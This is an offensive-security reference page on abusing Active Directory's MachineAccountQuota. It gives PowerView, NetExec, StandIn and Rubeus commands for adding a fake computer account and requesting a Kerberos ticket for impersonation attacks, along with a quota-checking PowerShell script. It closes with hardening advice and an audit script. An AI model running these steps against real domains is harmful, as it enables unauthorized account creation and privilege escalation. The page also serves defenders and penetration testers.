MachineAccountQuota Abuse
Vulnerability
By default, any authenticated domain user can create up to 10 computer accounts in the domain they belong to. This behavior is controlled by the ms-DS-MachineAccountQuota attribute of the domain object. You can leverage it to add your own fake computer, one whose password you choose yourself and which you can therefore authenticate as, without any real machine having to exist. This is useful for impersonation attacks such as S4U2Self Abuse or Kerberos Relay attacks.
Prerequisites
- Attribute ms-DS-MachineAccountQuota must be > 0 on the domain object.
- You must control a domain principal that has not already consumed its quota: the domain controller counts the existing computer objects whose mS-DS-CreatorSID attribute holds that principal's SID, so a user who already created 10 computers cannot add another even though the attribute still reads 10.
- The principal must hold the "Add workstations to domain" user right (SeMachineAccountPrivilege) on the domain controllers; it is granted to Authenticated Users by default.
Exploit
The attribute ms-DS-MachineAccountQuota is set on the domain object, i.e. the root of the domain naming context (for example DC=$sub,DC=$company,DC=$com). To check its value, use one of the following commands.
# Using PowerView. Replace with the appropriate Distinguished Name of the domain object.
Get-DomainObject -Identity "DC=$sub,DC=$company,DC=$com" -Properties ms-DS-MachineAccountQuota
# Using NetExec.
nxc ldap -d $Domain -u $Username -p $Password -M maq
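The two commands above only read the domain-wide value. What actually matters for you is how much of the quota your principal has left, because the domain controller enforces it by counting the computer objects whose mS-DS-CreatorSID is your SID. The following PowerShell is an added example, not code from the original page or from PowerView, StandIn or NetExec; it uses plain System.DirectoryServices (no RSAT module) and assumes it is run from a domain-joined host as the principal you want to check, with the default ACLs that let any authenticated user read the domain object and computer accounts.

```powershell
# Added example (not from the original page): compute the remaining MachineAccountQuota
# for a principal. Assumes a domain-joined host and default read ACLs on the domain.
function Get-RemainingMachineAccountQuota {
    param(
        # SID of the principal to check; defaults to the current user.
        [System.Security.Principal.SecurityIdentifier]$Sid =
            [System.Security.Principal.WindowsIdentity]::GetCurrent().User
    )

    # The attribute lives on the domain object (root of the default naming context).
    $domainDn = ([ADSI]"LDAP://RootDSE").defaultNamingContext
    $domain   = [ADSI]"LDAP://$domainDn"
    $quota    = [int]$domain.Properties['ms-DS-MachineAccountQuota'].Value

    # Computers created through the quota carry the creator's SID in mS-DS-CreatorSID.
    # Build the binary SID as an LDAP filter value: one \xx escape per byte.
    $sidBytes = New-Object byte[] $Sid.BinaryLength
    $Sid.GetBinaryForm($sidBytes, 0)
    $escaped  = -join ($sidBytes | ForEach-Object { '\{0:x2}' -f $_ })

    $searcher = New-Object System.DirectoryServices.DirectorySearcher($domain)
    $searcher.Filter   = "(&(objectClass=computer)(mS-DS-CreatorSID=$escaped))"
    $searcher.PageSize = 1000
    $searcher.PropertiesToLoad.Add('sAMAccountName') | Out-Null
    $created = $searcher.FindAll()

    # Remaining is an upper bound: the DC also requires the "Add workstations to domain"
    # user right (SeMachineAccountPrivilege), which this LDAP-only check cannot see.
    [pscustomobject]@{
        Principal = $Sid.Translate([System.Security.Principal.NTAccount]).Value
        Quota     = $quota
        Used      = $created.Count
        Remaining = [Math]::Max(0, $quota - $created.Count)
        Created   = @($created | ForEach-Object { $_.Properties['samaccountname'][0] })
    }
}

Get-RemainingMachineAccountQuota
```

If Remaining is 0 while Quota is 10, the principal already burned its quota (the Created list tells you which accounts); pick another principal you control, or reuse one of those existing computer accounts if you can still reset its password.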
If you are allowed to add a new computer account to the domain, use StandIn to do it (impacket's addcomputer.py or PowerMad's New-MachineAccount do the same job from Linux or from PowerShell).
# Generate the fake computer and add it to the domain. StandIn prints the random password
# it sets on the account; reuse it as $NewComputerPassword below.
./StandIn.exe --computer $ComputerName --make
# Compute the Kerberos keys (RC4, AES128, AES256) of the newly created computer.
./Rubeus.exe hash /password:$NewComputerPassword /user:$ComputerName$ /domain:$domain
# Ask for a TGT for it.
./Rubeus.exe asktgt /user:$ComputerName$ /aes256:$hash /nowrap
Useful links
- If you observe strange behavior with StandIn, take a look at GetDomain vs GetComputerDomain vs GetCurrentDomain from Rasta Mouse.
Recommendations
- Set ms-DS-MachineAccountQuota to 0. The attribute is a single domain-wide value, so it cannot be lowered for unprivileged users only; instead, delegate computer-account creation explicitly (the "Add workstations to domain" user right on the domain controllers, or Create Child rights on the OU that receives new machines) to the team that joins machines.
- Periodically review computer objects whose mS-DS-CreatorSID attribute is populated: it identifies accounts that were created through the quota and tells you who created them.
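The following PowerShell is an added example, not code from the original page, that applies both recommendations: it sets the quota to 0 on the domain object and lists every computer account that was created through the quota, resolving the creator from mS-DS-CreatorSID. It uses plain System.DirectoryServices (no RSAT module) and assumes it is run from a domain-joined host as a Domain Admin or another principal with write access to the domain object.

```powershell
# Added example (not from the original page): lock the quota down and audit the
# computer accounts created through it. Assumes a domain-joined host and a principal
# allowed to write ms-DS-MachineAccountQuota on the domain object.
function Set-MachineAccountQuotaZero {
    $domainDn = ([ADSI]"LDAP://RootDSE").defaultNamingContext
    $domain   = [ADSI]"LDAP://$domainDn"
    $before   = [int]$domain.Properties['ms-DS-MachineAccountQuota'].Value
    # The attribute is domain-wide: this single write affects every principal.
    $domain.Put('ms-DS-MachineAccountQuota', 0)
    $domain.SetInfo()
    [pscustomobject]@{ Domain = "$domainDn"; Before = $before; After = 0 }
}

function Get-QuotaCreatedComputers {
    # A populated mS-DS-CreatorSID means the object was added by a principal without
    # explicit Create-Child rights, i.e. through ms-DS-MachineAccountQuota.
    $domainDn = ([ADSI]"LDAP://RootDSE").defaultNamingContext
    $searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]"LDAP://$domainDn")
    $searcher.Filter   = '(&(objectClass=computer)(mS-DS-CreatorSID=*))'
    $searcher.PageSize = 1000
    foreach ($p in 'sAMAccountName', 'mS-DS-CreatorSID', 'whenCreated', 'dNSHostName') {
        $searcher.PropertiesToLoad.Add($p) | Out-Null
    }

    foreach ($r in $searcher.FindAll()) {
        # mS-DS-CreatorSID is returned as a binary SID; resolve it to DOMAIN\user when possible.
        $sid     = New-Object System.Security.Principal.SecurityIdentifier($r.Properties['ms-ds-creatorsid'][0], 0)
        $creator = $sid.Value
        try { $creator = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { }

        [pscustomobject]@{
            Computer    = $r.Properties['samaccountname'][0]
            DnsHostName = @($r.Properties['dnshostname'])[0]
            Created     = $r.Properties['whencreated'][0]
            CreatedBy   = $creator
        }
    }
}

Set-MachineAccountQuotaZero
Get-QuotaCreatedComputers | Sort-Object Created -Descending | Format-Table -AutoSize
```

Setting the quota to 0 does not remove accounts that were already created through it, which is why the audit runs after the change; a creator that no longer resolves to a name (the raw SID is shown instead) points at a deleted user whose computer account should be investigated and removed.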